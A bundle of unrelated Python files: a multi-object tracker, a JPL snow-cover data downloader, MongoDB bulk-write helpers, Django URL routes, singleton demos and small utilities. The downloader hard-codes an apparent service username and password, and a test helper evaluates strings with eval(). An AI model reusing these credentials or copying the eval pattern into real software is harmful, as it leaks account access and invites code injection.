        self.predictor = predictor
        self.max_ttl = max_ttl
        self.max_feature_history = max_feature_history
        self.max_detection_history = max_detection_history
        self.min_time_lived = min_time_lived
        self.max_id = 0
        self.tracklets_active = []
        self.tracklets_finished = []
        self.frame_num = 0
        self.logger = logging.getLogger('MOT')

    def clear(self):
        """Reset all tracking state (IDs, tracklet lists, frame counter)."""
        self.max_id = 0
        self.tracklets_active = []
        self.tracklets_finished = []
        self.frame_num = 0

    def tick(self, img):
        """
        Detect, encode and match, following the tracking-by-detection paradigm.
        The tracker works online. For each new frame, the tracker ticks once.
        :param img: A 3D numpy array with shape (H, W, 3). The new frame in the sequence.
        """
        self.frame_num += 1
        # Prediction
        self.predict(img)
        # Detection
        detections = self.detector(img)
        # Encoding
        features = self.encode(detections, img)
        # Data Association
        row_ind, col_ind = self.matcher(self.tracklets_active, features)
        # Tracklet Update
        self.update(row_ind, col_ind, detections, features)
        self.logger.info(
            'Frame #{}: {} target(s) active, {} object(s) detected'.format(self.frame_num, len(self.tracklets_active),
                                                                           len(detections)))

    def encode(self, detections, img):
        """
        Encode detections using all encoders.
        :param detections: A list of Detection objects.
        :param img: The image ndarray.
        :return: A list of dicts, with features generated by encoders for each detection.
        """
        features = [{'box': detections[i].box} for i in range(len(detections))]
        for encoder in self.encoders:
            _features = encoder(detections, img)
            for i in range(len(detections)):
                features[i][encoder.name] = _features[i]
        return features

    def predict(self, img):
        """
        Predict target positions in the incoming frame.
        :param img: The image ndarray.
        """
        if self.predictor is not None:
            # BUG FIX: the original used `is 'ECCPredictor'`, an identity
            # comparison that only works when the interpreter happens to
            # intern the string; `==` compares by value.
            if self.predictor.__class__.__name__ == 'ECCPredictor':
                # ECC-style predictors additionally need the previous frame.
                self.predictor(self.tracklets_active, img, self.last_frame)
                self.last_frame = img.copy()
            else:
                self.predictor(self.tracklets_active, img)

    def update(self, row_ind, col_ind, detections, detection_features):
        """
        Update the tracklets.
        *****************************************************
        Override this function for customized updating policy
        *****************************************************
        :param row_ind: A list of integers. Indices of the matched tracklets.
        :param col_ind: A list of integers. Indices of the matched detections.
        :param detections: A list of Detection objects.
        :param detection_features: The features of the detections. It can be any form you want.
        """
        # Update tracked tracklets' features
        for i in range(len(row_ind)):
            self.tracklets_active[row_ind[i]].update(self.frame_num, detections[col_ind[i]],
                                                     detection_features[col_ind[i]])
        # Deal with unmatched tracklets.
        # NOTE(review): kept as an instance attribute (not a local) in case
        # subclasses or external code inspect it between ticks.
        self.tracklets_to_kill = []
        unmatched_tracklets = []
        for i in range(len(self.tracklets_active)):
            if i not in row_ind:
                if self.tracklets_active[i].fade():
                    self.tracklets_to_kill.append(self.tracklets_active[i])
                else:
                    unmatched_tracklets.append(self.tracklets_active[i])
        # Kill tracklets that are unmatched for a while
        for tracklet in self.tracklets_to_kill:
            self.kill_tracklet(tracklet)
        # Create new tracklets with unmatched detections.  The predictor is
        # initiated per new tracklet (one-element list each iteration).
        for i in range(len(detection_features)):
            new_tracklets = []
            if i not in col_ind:
                new_tracklet = Tracklet(0, self.frame_num, detections[i], detection_features[i], max_ttl=self.max_ttl,
                                        max_feature_history=self.max_feature_history,
                                        max_detection_history=self.max_detection_history)
                new_tracklets.append(new_tracklet)
                self.add_tracklet(new_tracklet)
                if self.predictor is not None:
                    self.predictor.initiate(new_tracklets)

    def terminate(self):
        """
        Terminate tracking and move all active tracklets to the finished ones.
        """
        for tracklet in self.tracklets_active:
            self.kill_tracklet(tracklet)

    def assignment_matrix(self, similarity_matrix):
        """
        Calculate assignment matrix using the matching algorithm. Only for debugging.
        NOTE(review): calls the matcher with a single argument, unlike tick();
        only valid for matchers that accept a similarity matrix directly.
        :param similarity_matrix: A 2D numpy array. The similarity matrix.
        :return: A 2D numpy array with the same shape as the similarity matrix. The assignment matrix.
        """
        row_ind, col_ind = self.matcher(similarity_matrix)
        assignment_matrix = np.zeros([similarity_matrix.shape[0], similarity_matrix.shape[1]])
        for i in range(len(row_ind)):
            assignment_matrix[row_ind[i], col_ind[i]] = 1
        # For debugging, display similarity matrix and assignment matrix
        if similarity_matrix.shape[0] > 0:
            print('row_ind: ', row_ind)
            print('col_ind: ', col_ind)
            cv2.imshow('similarity', cv2.resize(similarity_matrix, (600, 600), interpolation=cv2.INTER_NEAREST))
            cv2.imshow('assignment', cv2.resize(assignment_matrix, (600, 600), interpolation=cv2.INTER_NEAREST))
        return assignment_matrix

    def add_tracklet(self, tracklet):
        """
        Add a tracklet to the active tracklets after giving it a new ID.
        :param tracklet: The tracklet to be added.
        """
        tracklet.id = self.max_id
        self.max_id += 1
        self.tracklets_active.append(tracklet)

    def kill_tracklet(self, tracklet):
        """Remove a tracklet from the active list (finished list kept disabled)."""
        self.tracklets_active.remove(tracklet)
        # if tracklet.time_lived >= self.min_time_lived:
        #     self.tracklets_finished.append(tracklet)
|
"""Class definition for the MODSCAG snow cover fraction data type.
.. module:: modscag
:synopsis: Definition of the MODSCAG class
.. moduleauthor:: Kostas Andreadis <kandread@jpl.nasa.gov>
"""
import dbio
from datetime import timedelta
import datasets
import modis
import requests
from requests.auth import HTTPDigestAuth
import tempfile
import lxml.html
import subprocess
import glob
import shutil
import numpy as np
# PostGIS table that stores the ingested snow cover fraction rasters.
table = "snow.modscag"
# SECURITY(review): hard-coded service credentials committed to source —
# move these to a configuration file or environment variables.
username = "akostas"
password = "m0red@7@!"
def dates(dbname):
    """Return the dates for which MODSCAG data already exist in *dbname*."""
    return datasets.dates(dbname, table)
def download(dbname, dts, bbox):
    """Downloads the MODSCAG snow cover fraction data product for each date
    between dts[0] and dts[-1] and imports it into the PostGIS database
    *dbname*, clipped to *bbox* when one is given.

    :param dbname: name of the target PostGIS database
    :param dts: sequence of datetimes; only the first and last bound the range
    :param bbox: (xmin, ymin, xmax, ymax) bounding box, or None for no clipping
    """
    res = 0.01  # output resolution in degrees
    tiles = modis.findTiles(bbox)
    for dt in [dts[0] + timedelta(dti) for dti in range((dts[-1] - dts[0]).days + 1)]:
        temppath = tempfile.mkdtemp()
        url = "https://snow-data.jpl.nasa.gov/modscag-historic/{0}/{1}".format(dt.year, dt.strftime("%j"))
        r = requests.get(url, auth=HTTPDigestAuth(username, password))
        if r.status_code == 200:
            dom = lxml.html.fromstring(r.text)
            links = [link for link in dom.xpath('//a/@href') if link.find("snow_fraction.tif") > 0]
            for t in tiles:
                # BUG FIX: materialize the filter as a list so len() and
                # indexing work on Python 3 (filter() returns an iterator
                # there); behavior is unchanged on Python 2.
                filenames = [f for f in links if f.find("h{0:02d}v{1:02d}".format(t[1], t[0])) > 0]
                if len(filenames) > 0:
                    filename = filenames[0]
                    r = requests.get("{0}/{1}".format(url, filename), auth=HTTPDigestAuth(username, password))
                    with open("{0}/{1}".format(temppath, filename), 'wb') as fout:
                        fout.write(r.content)
            tifs = glob.glob("{0}/*.tif".format(temppath))
            if len(tifs) > 0:
                # Mosaic the tiles, mask values above 100 (non-snow codes),
                # reproject to lat/long, and optionally clip to the bbox.
                subprocess.call(["gdal_merge.py", "-o", "{0}/snow.tif".format(temppath)] + tifs)
                cmd = " ".join(["gdal_calc.py", "-A", "{0}/snow.tif".format(temppath), "--outfile={0}/snow1.tif".format(
                    temppath), "--NoDataValue=-9999", "--calc=\"(A<101.0)*(A+9999.0)-9999.0\""])
                subprocess.call(cmd, shell=True)
                cmd = " ".join(["gdalwarp", "-t_srs", "'+proj=latlong +ellps=sphere'", "-tr", str(
                    res), str(-res), "{0}/snow1.tif".format(temppath), "{0}/snow2.tif".format(temppath)])
                subprocess.call(cmd, shell=True)
                if bbox is None:
                    pstr = []
                else:
                    pstr = ["-projwin", str(bbox[0]), str(bbox[3]), str(bbox[2]), str(bbox[1])]
                subprocess.call(["gdal_translate", "-a_srs", "epsg:4326"] + pstr + ["{0}/snow2.tif".format(temppath), "{0}/snow3.tif".format(temppath)])
                dbio.ingest(dbname, "{0}/snow3.tif".format(temppath), dt, table, False)
            shutil.rmtree(temppath)
        else:
            print("MODSCAG data not available for {0}. Skipping download!".format(
                dt.strftime("%Y-%m-%d")))
class Modscag(object):
    """Assimilation interface for the MODSCAG snow cover fraction product."""

    def __init__(self):
        """Initialize MODSCAG snow cover fraction object."""
        self.statevar = ["swq"]     # model state variable(s) to update
        self.obsvar = "snow_cover"  # observed variable name
        self.res = 0.01             # raster resolution in degrees
        self.stddev = 0.05          # assumed observation error std. dev.
        self.tablename = table

    def x(self, dt, models):
        """Retrieve the state variable ensemble from the database for date *dt*.

        :return: (data, lat, lon, gid), each reshaped to (npixels, nens).
        """
        data = {}
        db = dbio.connect(models.dbname)
        cur = db.cursor()
        for s in self.statevar:
            sql = "select ensemble,st_x(geom),st_y(geom),val from (select ensemble,(ST_PixelAsCentroids(rast)).* from {0}.{1} where fdate=date '{2}-{3}-{4}') foo group by ensemble,geom order by ensemble".format(
                models.name, s, dt.year, dt.month, dt.day)
            cur.execute(sql)
            e, lon, lat, vals = zip(*cur.fetchall())
            gid = [models[0].lgid[(l[0], l[1])] for l in zip(lat, lon)]
            nens = max(e)
            # BUG FIX: use floor division so the reshape dimensions stay
            # integers on Python 3 ("/" yields floats there); identical
            # result under Python 2's integer division.
            data[s] = np.array(vals).reshape((len(vals) // nens, nens))
            lat = np.array(lat).reshape((len(lat) // nens, nens))
            lon = np.array(lon).reshape((len(lon) // nens, nens))
            gid = np.array(gid).reshape((len(gid) // nens, nens))
        cur.close()
        db.close()
        return data, lat, lon, gid

    def get(self, dt, models):
        """Retrieve observations from database for date *dt*.

        :return: (data, lat, lon) as column vectors, or (None, None, None)
            when no observations intersect the basin for that date.
        """
        db = dbio.connect(models.dbname)
        cur = db.cursor()
        sql = "select st_x(geom),st_y(geom),val from (select (st_pixelascentroids(st_clip(rast,geom))).* from {0},{1}.basin where st_intersects(rast,geom) and fdate=date '{2}-{3}-{4}') foo".format(
            self.tablename, models.name, dt.year, dt.month, dt.day)
        cur.execute(sql)
        if bool(cur.rowcount):
            lon, lat, data = zip(*cur.fetchall())
            data = np.array(data).reshape((len(data), 1))
            lat = np.array(lat).reshape((len(lat), 1))
            lon = np.array(lon).reshape((len(lon), 1))
            self.nobs = len(data)
        else:
            data = lat = lon = None
        cur.close()
        db.close()
        return data, lat, lon
|
from pprint import pprint, pformat # pylint: disable=unused-import
import logging
import time
from copy import deepcopy
# from collections import defaultdict
from pymongo import UpdateOne, InsertOne
from pymongo.errors import BulkWriteError
def bulk_write(db, item_type, ops, stat=None, retries=3, log_first_failop=True):
    """
    Tries to apply `ops` Update operations to `item_type`
    collection with `bulk_write` method.
    Gives up if `retries` retries failed.
    Args:
        db - pymongo collection object
        item_type - name of collection
        ops - list of operations like UpdateOne
        stat - instance of `ioweb.stat:Stat`
        retries - number of retries
        log_first_failop - when True, log the first failed write op of the
            final failed attempt before re-raising
    Returns:
        The BulkWriteResult of the successful attempt.
    Raises:
        BulkWriteError: when every attempt fails.
    """
    if stat:
        stat.inc("bulk-write-%s" % item_type)
    for retry in range(retries):
        try:
            res = db[item_type].bulk_write(ops, ordered=False)
        except BulkWriteError as ex:
            # TODO: repeat only failed operations!!!
            # TODO: repeat only in case of DUP (11000) errors
            if retry == (retries - 1):
                # Final attempt failed: optionally log the first error, then
                # propagate the exception to the caller.
                if log_first_failop:
                    logging.error(
                        "First failed operation:\n%s",
                        pformat(ex.details["writeErrors"][0]),
                    )
                raise
            else:
                if stat:
                    stat.inc("bulk-write-%s-retry" % item_type)
        else:
            # Success: record upsert/modify counters and stop retrying.
            if stat:
                stat.inc(
                    "bulk-write-%s-upsert" % item_type, res.bulk_api_result["nUpserted"]
                )
                stat.inc(
                    "bulk-write-%s-change" % item_type, res.bulk_api_result["nModified"]
                )
            break
    return res
class BulkWriter(object):
    """Buffers pymongo write operations and flushes them in batches of
    `bulk_size` via the module-level bulk_write() helper."""

    def __init__(self, db, item_type, bulk_size=100, stat=None, retries=3):
        self.database = db
        self.item_type = item_type
        self.stat = stat
        self.retries = retries
        self.bulk_size = bulk_size
        self.ops = []

    def _write_ops(self):
        """Flush the buffered operations and reset the buffer."""
        result = bulk_write(self.database, self.item_type, self.ops, self.stat)
        self.ops = []
        return result

    def _enqueue(self, op):
        """Buffer *op*; flush and return the result once the buffer is full."""
        self.ops.append(op)
        if len(self.ops) < self.bulk_size:
            return None
        return self._write_ops()

    def update_one(self, *args, **kwargs):
        return self._enqueue(UpdateOne(*args, **kwargs))

    def insert_one(self, *args, **kwargs):
        return self._enqueue(InsertOne(*args, **kwargs))

    def flush(self):
        """Write out any remaining buffered operations."""
        return self._write_ops() if self.ops else None
def iterate_collection(
    db,
    item_type,
    query,
    sort_field,
    iter_chunk=1000,
    fields=None,
    infinite=False,
    limit=None,
):
    """
    Iterate over `db[item_type]` collection items matching `query`
    sorted by `sort_field`.
    Intenally, it fetches chunk of `iter_chunk` items at once and
    iterates over it. Then fetch next chunk.

    Pagination works by remembering the last seen `sort_field` value and
    querying for strictly greater values, so `sort_field` must be unique
    and totally ordered (e.g. `_id`).

    Args:
        fields - optional projection passed to find()
        infinite - when True, sleep and restart from the beginning instead
            of returning once the collection is exhausted
        limit - optional overall cap on the number of yielded items
    """
    recent_id = None
    count = 0
    query = deepcopy(query)  # avoid side effects
    if sort_field in query:
        logging.error(
            "Function `iterate_collection` received query"
            " that contains a key same as `sort_field`."
            " That might goes unexpected and weird ways."
        )
    while True:
        if recent_id:
            # Resume strictly after the last item of the previous chunk.
            query[sort_field] = {"$gt": recent_id}
        else:
            # Fresh start (or restart in infinite mode): drop any cursor key.
            if sort_field in query:
                del query[sort_field]
        items = list(
            db[item_type].find(query, fields, sort=[(sort_field, 1)], limit=iter_chunk)
        )
        if not items:
            if infinite:
                sleep_time = 5
                logging.debug("No items to process. Sleeping %d seconds", sleep_time)
                time.sleep(sleep_time)
                recent_id = None
            else:
                return
        else:
            for item in items:
                yield item
                recent_id = item[sort_field]
                count += 1
                if limit and count >= limit:
                    return
def bulk_dup_insert(db, item_type, ops, dup_key, stat=None):
    """Insert `ops` (InsertOne only), tolerating duplicate-key errors.

    Operations whose `dup_key` value repeats within `ops` are dropped
    locally before writing; duplicate-key (11000) errors reported by the
    server are treated as success for the non-conflicting documents.

    Returns:
        List of `dup_key` values that were actually inserted.
    Raises:
        Exception: if an op is not InsertOne or lacks `dup_key`.
        BulkWriteError: for any write error other than pure duplicates.
    """
    if stat:
        stat.inc("bulk-dup-insert-%s" % item_type, len(ops))
    all_keys = set()
    uniq_ops = []
    for op in ops:
        if not isinstance(op, InsertOne):
            raise Exception(
                "Function bulk_dup_insert accepts only"
                " InsertOne operations. Got: %s" % op.__class__.__name__
            )
        if dup_key not in op._doc:  # pylint: disable=protected-access
            raise Exception(
                "Operation for bulk_dup_insert"
                ' does not have key "%s": %s'
                % (dup_key, str(op._doc)[:1000])  # pylint: disable=protected-access
            )
        key = op._doc[dup_key]  # pylint: disable=protected-access
        # Keep only the first operation per key value.
        if key not in all_keys:
            all_keys.add(key)
            uniq_ops.append(op)
    try:
        db[item_type].bulk_write(uniq_ops, ordered=False)
    except BulkWriteError as ex:
        # Accept the batch when every reported error is a duplicate key.
        if (
            all(x["code"] == 11000 for x in ex.details["writeErrors"])
            and not ex.details["writeConcernErrors"]
        ):
            error_keys = set(x["op"][dup_key] for x in ex.details["writeErrors"])
            res_keys = list(all_keys - error_keys)
            if stat:
                stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(res_keys))
            return res_keys
        else:
            raise
    else:
        if stat:
            stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(all_keys))
        return list(all_keys)
def bulk_simple_insert(db, item_type, ops, stat=None):
    """Insert `ops` (InsertOne only), tolerating duplicate-key errors.

    Unlike bulk_dup_insert, the operations are not de-duplicated locally;
    duplicate-key (11000) errors from the server are simply subtracted
    from the "inserted" counter.

    Raises:
        Exception: if an op is not an InsertOne operation.
        BulkWriteError: for any write error other than pure duplicates.
    """
    # NOTE(review): the stat counter names reuse the "bulk-dup-insert" prefix,
    # apparently copy-pasted from bulk_dup_insert; kept unchanged so existing
    # dashboards keep working — confirm before renaming.
    if stat:
        stat.inc("bulk-dup-insert-%s" % item_type, len(ops))
    for op in ops:
        if not isinstance(op, InsertOne):
            # BUG FIX: the message named a non-existent "simple_bulk_insert";
            # it now reports this function's actual name.
            raise Exception(
                "Function bulk_simple_insert accepts only"
                " InsertOne operations. Got: %s" % op.__class__.__name__
            )
    try:
        db[item_type].bulk_write(ops, ordered=False)
    except BulkWriteError as ex:
        if (
            all(x["code"] == 11000 for x in ex.details["writeErrors"])
            and not ex.details["writeConcernErrors"]
        ):
            if stat:
                stat.inc(
                    "bulk-dup-insert-%s-inserted" % item_type,
                    len(ops) - len(ex.details["writeErrors"]),
                )
        else:
            raise
    else:
        if stat:
            stat.inc("bulk-dup-insert-%s-inserted" % item_type, len(ops))
|
from django.urls import path
from savings import views
# URL namespace for reversing, e.g. reverse("savings:indexs").
app_name = "savings"

# Each class-based view route is paired with a function-based counterpart.
urlpatterns = [
    path('indexs/', views.Index.as_view(), name="indexs"),
    path('list_users/', views.ListUsers.as_view(), name="list_users"),
    path('user_lists/', views.list_Users, name="user_lists"),
    path('list_saving/', views.ListSaving.as_view(), name="list_saving"),
    path('saving_list/', views.list_Saving, name="saving_list"),
    path('saving_create/', views.SavingCreate.as_view(), name="saving_create"),
    path('create_saving/', views.createCundina, name="create_saving"),
    path('user_creates/', views.UserCreate.as_view(), name="user_creates"),
    path('create_users/', views.createUser, name="create_users"),
]
|
from django.contrib import admin
from django.urls import path
from .views import SocialListView, SocialUpdateView
# Routes for listing and editing Social records.
urlpatterns = [
    path('social/list/', SocialListView.as_view(), name='socialList'),
    path('social/update/<int:pk>/', SocialUpdateView.as_view(), name='socialUpdate')
]
|
# Read the two factors from the user (Icelandic prompts: "first"/"second" number).
a = int(input("fyrri tala "))
b = int(input("seinni tala "))
def multiple(a, b):
    """Return the product of *a* and *b*."""
    return a * b
samtals = multiple(a, b)
# NOTE(review): the label reads "n * n" but the value is a * b — confirm wording.
print("n * n = ", samtals)
# coding=utf-8
# Prefer setuptools; fall back to distutils where it is unavailable.
try:
    from setuptools import setup
except ImportError:
    from distutils.core import setup

import githon

# Runtime dependencies, one requirement per line of requirements.pip.
requirements = open('requirements.pip').read().splitlines()

# Package metadata passed to setup() below.
kw = dict(
    name = 'githon',
    version = '0.7.0',
    description = 'A simple Data Scraping library for GitHub REST API v3',
    long_description = open('README.md', 'r').read(),
    author = 'Marcos Vinícius Brás',
    author_email = 'marcosvbras@gmail.com',
    url = 'https://github.com/marcosvbras/githon',
    download_url = 'https://github.com/marcosvbras/githon',
    license='Apache',
    py_modules = ['githon'],
    packages=['githon'],
    classifiers = [
        'Development Status :: 4 - Beta',
        'Environment :: Web Environment',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: Apache Software License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 3.4',
        'Programming Language :: Python :: 3.5',
        'Topic :: Internet',
        'Topic :: Software Development :: Libraries :: Python Modules',
    ],
    keywords='data github scraping api',
    install_requires=requirements,
    python_requires='~=3.3',
)

setup(**kw)
|
class MyBeautifulGril(object):
    """My beautiful goddess — singleton via __new__ plus a first-init flag."""
    # Shared instance and a class-level flag so __init__ only runs its
    # setup once (Python calls __init__ on every construction).
    __instance = None
    __isFirstInit = False

    def __new__(cls, name):
        # Create the instance only on the first construction.
        if not cls.__instance:
            MyBeautifulGril.__instance = super().__new__(cls)
        return cls.__instance

    def __init__(self, name):
        # Only honour the very first initialization; later calls just print.
        if not self.__isFirstInit:
            self.__name = name
            print("遇见" + name + ",我一见钟情!")
            MyBeautifulGril.__isFirstInit = True
        else:
            print("遇见" + name + ",我置若罔闻!")

    def showMyHeart(self):
        print(self.__name + "就我心中的唯一!")
# 各种singleton实现方式
########################################################################################################################
class Singleton1(object):
    """Singleton, approach #1: override __new__ and guard __init__ with a flag."""
    __instance = None
    __isFirstInit = False

    def __new__(cls, name):
        # Only the first construction actually allocates an object.
        if cls.__instance is None:
            Singleton1.__instance = super().__new__(cls)
        return cls.__instance

    def __init__(self, name):
        # __init__ runs on every construction; bail out after the first.
        if self.__isFirstInit:
            return
        self.__name = name
        Singleton1.__isFirstInit = True

    def getName(self):
        return self.__name
# # # Test
# tony = Singleton1("Tony")
# karry = Singleton1("Karry")
# print(tony.getName(), karry.getName())
# print("id(tony):", id(tony), "id(karry):", id(karry))
# print("tony == karry:", tony == karry)
# 方式二
#========================================================================================
class Singleton2(type):
    """Singleton, approach #2: a metaclass that caches the single instance."""

    def __init__(cls, what, bases=None, dict=None):
        super().__init__(what, bases, dict)
        cls._instance = None  # cache slot for the one shared instance

    def __call__(cls, *args, **kwargs):
        # Construct on first call only; afterwards serve the cached object.
        existing = cls._instance
        if existing is None:
            existing = super().__call__(*args, **kwargs)
            cls._instance = existing
        return existing
class CustomClass(metaclass=Singleton2):
    """A user-defined class whose single instance is enforced by Singleton2."""

    def __init__(self, name):
        self.__name = name

    def getName(self):
        return self.__name
# Demo: both constructions return the same shared instance, so the second
# name is ignored and the ids/equality match.
tony = CustomClass("Tony")
karry = CustomClass("Karry")
print(tony.getName(), karry.getName())
print("id(tony):", id(tony), "id(karry):", id(karry))
print("tony == karry:", tony == karry)
# 方式三
#========================================================================================
def singletonDecorator(cls, *args, **kwargs):
    """Class decorator: cache one instance per decorated class."""
    cache = {}

    def wrapperSingleton(*args, **kwargs):
        # EAFP: serve from the cache; build the instance only on a miss.
        try:
            return cache[cls]
        except KeyError:
            obj = cls(*args, **kwargs)
            cache[cls] = obj
            return obj

    return wrapperSingleton
@singletonDecorator
class Singleton3:
    """Singleton, approach #3: enforced by the singletonDecorator above."""

    def __init__(self, name):
        # BUG FIX: the parameter was misspelled "selfself", so referencing
        # "self" in the body raised NameError on construction.
        self.__name = name

    def getName(self):
        return self.__name
# tony = Singleton3("Tony")
# karry = Singleton3("Karry")
# print(tony.getName(), karry.getName())
# print("id(tony):", id(tony), "id(karry):", id(karry))
# print("tony == karry:", tony == karry)
# Version 2.0
########################################################################################################################
@singletonDecorator
class MyBeautifulGril(object):
    """My beautiful goddess — version 2.0, singleton via the decorator.

    The decorator caches the first instance, so __init__ only ever runs for
    the first construction; later constructions return the cached object.
    """

    def __init__(self, name):
        # BUG FIX: both methods used a misspelled "selfself" parameter, so
        # referencing "self" raised NameError at construction time.
        self.__name = name
        # NOTE(review): after the assignment above this condition is always
        # true, so the else branch is unreachable; the decorator already
        # prevents re-initialisation. Kept to preserve the original intent.
        if self.__name == name:
            print("遇见" + name + ",我一见钟情!")
        else:
            print("遇见" + name + ",我置若罔闻!")

    def showMyHeart(self):
        print(self.__name + "就我心中的唯一!")
# Test
########################################################################################################################
# def TestLove():
# jenny = MyBeautifulGril("Jenny")
# jenny.showMyHeart()
# kimi = MyBeautifulGril("Kimi")
# kimi.showMyHeart()
# print("id(jenny):", id(jenny), " id(kimi):", id(kimi))
#
#
# TestLove()
"""
使用装饰器
"""
# def singleton(cls):
# __instance = {}
# def _singleton(*args, **kwargs):
# if cls not in __instance:
# __instance[cls] = cls(*args, **kwargs)
# return __instance[cls]
# return _singleton
#
# @singleton
# class A(object):
# a = 1
#
# def __init__(self, x=0):
# self._x = x
#
# a = A(2)
# b = A(3)
# print(a, a.__dict__)
# print(b, b.__dict__)
# print(b._x)
"""
使用类
"""
# class Singleton(object):
#
# def __init__(self):
# pass
#
# @classmethod
# def instance(cls, *args, **kwargs):
# if not hasattr(cls, '_instance'):
# cls._instance = cls(*args, **kwargs)
# return cls._instance
#
# a = Singleton().instance()
# b = Singleton().instance()
# print(a, b)
# """
# 多线程测试
# """
# import threading
#
# class Singleton(object):
#
# __instance_lock = threading.Lock()
# def __init__(self):
# import time
# time.sleep(1)
#
# @classmethod
# def instance(cls, *args, **kwargs):
# with Singleton.__instance_lock:
# if not hasattr(cls, '_instance'):
# cls._instance = cls(*args, **kwargs)
# return cls._instance
#
#
# def task(arg):
# s = Singleton.instance()
# print(s)
#
#
# for i in range(10):
# t = threading.Thread(target=task, args=[i,])
# t.start()
import unittest
class TestStringMethods(unittest.TestCase):
    """Sanity checks for a handful of str methods."""

    def test_upper(self):
        self.assertEqual('foo'.upper(), 'FOO')

    def test_isupper(self):
        self.assertTrue('FOO'.isupper())
        self.assertFalse('Foo'.isupper())

    def test_split(self):
        text = 'hello world'
        self.assertEqual(text.split(), ['hello', 'world'])
        # split() must reject a non-string separator with TypeError
        with self.assertRaises(TypeError):
            print(text.split(2))
#
# if __name__ == '__main__':
# unittest.main()
import unittest
def calc(expression):
    """Evaluate the arithmetic *expression* string and return its value.

    SECURITY: uses eval(); only pass trusted, internally-generated strings
    (as the test harness below does) — never user-supplied input.
    """
    return eval(expression)
def add_test(name, asserts):
    """Dynamically create a unittest.TestCase subclass named *name*.

    *asserts* is a string of the form "<expression>=<expected>"; the generated
    test evaluates the left side with calc() and compares its str() form
    against the right side.  The class is installed into this module's
    globals so unittest discovery can find it.
    """
    def test_method(asserts):
        # Bind *asserts* into the closure of the generated test function.
        def fn(self):
            left, right = asserts.split('=')
            expected = str(calc(left))
            self.assertEqual(expected, right)
        return fn
    # Build the TestCase subclass with a single test and register it globally.
    d = {'test1': test_method(asserts)}
    cls = type(name, (unittest.TestCase,), d)
    globals()[name] = cls
if __name__ == '__main__':
    # Generate one TestCase per expression, then hand off to unittest.
    for i, t in enumerate([
            "1+2=3",
            "3*5*6=90"]):
        add_test("Test%d" % i, t)
    unittest.main()
|
import re
# Pre-compiled pattern validating a DNS-style domain: optional subdomain
# labels, a constrained penultimate label, and a final TLD label.
DOMAIN_PATTERN = re.compile(
    r'^(?:[a-z\d\-_]{1,62}\.){0,125}'
    r'(?:[a-z\d](?:\-(?=\-*[a-z\d])|[a-z]|\d){0,62}\.)'
    r'[a-z\d]{1,63}$'
)

# The srcset width tolerance dictates the _maximum tolerated size_
# difference between an image's downloaded size and its rendered size.
# For example, setting this value to 10 means that an image will not
# render more than 10% larger or smaller than its native size.
SRCSET_WIDTH_TOLERANCE = 0.08

# The minimum srcset width tolerance.
SRCSET_MIN_WIDTH_TOLERANCE = 0.01

# The default srcset target ratios (device pixel ratios 1x through 5x).
SRCSET_DPR_TARGET_RATIOS = range(1, 6)

# Maximum width (pixels) ever emitted in a srcset.
SRCSET_MAX_SIZE = 8192

# Representation of an image with a width of zero. This value is used
# in validation contexts, i.e. "is the width of the passed or requested
# image greater than or equal to the 'zero width image'."
IMAGE_ZERO_WIDTH = 0

# The minimum width of a default generated image-width.
IMAGE_MIN_WIDTH = 100

# The maximum width of a default generated image-width.
IMAGE_MAX_WIDTH = 8192

# The default dpr qualities used when variable output quality is enabled.
DPR_QUALITIES = {1: 75, 2: 50, 3: 35, 4: 23, 5: 20}

# Default target widths: a geometric-like progression from 100 to 8192.
SRCSET_TARGET_WIDTHS = [
    100, 116, 135, 156, 181, 210, 244, 283,
    328, 380, 441, 512, 594, 689, 799, 927,
    1075, 1247, 1446, 1678, 1946, 2257, 2619,
    3038, 3524, 4087, 4741, 5500, 6380, 7401, 8192]
|
# By Rakeen Rouf
import pandas as pd
import os
import platform
import time
class TxtToCsv:
    """Convert acoustic-emission (AE) txt dumps into a CSV for plotting.

    A side file, History.txt, records how many lines were processed and the
    running energy sum so that each loaddata() call only processes new rows.
    """

    def __init__(self, data_file='C:/Users/rakee/Downloads/livedata.txt'):
        # NOTE(review): hard-coded absolute Windows path — consider making
        # this configurable for other machines.
        self.data = pd.DataFrame()
        self.data_file = data_file

    def loaddata(self):
        """Read new rows, accumulate energy, and write the plot CSV."""
        # The header size varies between file variants: try skipping 7 rows
        # first; fall back to 8 when the 'ID' column is not found.
        try:
            self.data = pd.read_fwf(self.data_file, skiprows=7)
            # Lets just keep the data points which have id == 1
            self.data = self.data.loc[self.data['ID'] == '1']
        except KeyError:
            self.data = pd.read_fwf(self.data_file, skiprows=8)
            print(self.data.columns.values)
            # Lets just keep the data points which have id == 1
            self.data = self.data.loc[self.data['ID'] == '1']
        # Lets read in how many lines we had in the last iter
        line_number = int(pd.read_fwf('History.txt')['History'][0])
        # cum sum from last iter
        cum_sum_ener = int(pd.read_fwf('History.txt')['History'][1])
        temp_data = pd.DataFrame(columns=self.data.columns)
        self.data = pd.concat([temp_data, self.data.iloc[line_number:]], join="inner")
        self.data = self.data.astype('float')
        self.data['cum_sum_ENER'] = self.data['ENER'].cumsum() + cum_sum_ener
        # NOTE(review): the stored count is len() of the *new* slice, not the
        # absolute row offset — confirm this matches the producer's format.
        txt_file = open("History.txt", "w")  # Lets update our history file for the next iter
        txt_file.write('History\n')
        txt_file.write(str(len(self.data)))
        txt_file.write('\n')
        txt_file.write(str(int(self.data['cum_sum_ENER'].iloc[-1])))
        txt_file.close()
        plot_data = self.data[['SSSSSSSS.mmmuuun', 'cum_sum_ENER', 'DURATION', 'AMP']]
        plot_data.to_csv('C:/Users/rakee/Downloads/fog_plot_data.txt')

    def modification_date(self):
        # Return the data file's mtime (seconds since the epoch) on any OS.
        if platform.system() == 'Windows':
            return os.path.getmtime(self.data_file)
        else:
            stat = os.stat(self.data_file)
            return stat.st_mtime
if __name__ == '__main__':
    # Lets write a txt file containing all running history
    # (reset counters: 0 lines processed, 0 cumulative energy).
    txt_file_writer = open("History.txt", "w")
    txt_file_writer.write('History\n')
    txt_file_writer.write(str(0))
    txt_file_writer.write('\n')
    txt_file_writer.write(str(0))
    txt_file_writer.close()
    txt_to_csv = TxtToCsv()
    mod_time = 0
    # Poll the data file forever and reprocess whenever its mtime advances.
    while True:
        cur_mod_time = txt_to_csv.modification_date()
        if mod_time < cur_mod_time:
            time.sleep(0.01)  # give the writer a moment to finish the file
            txt_to_csv.loaddata()
            print('works')
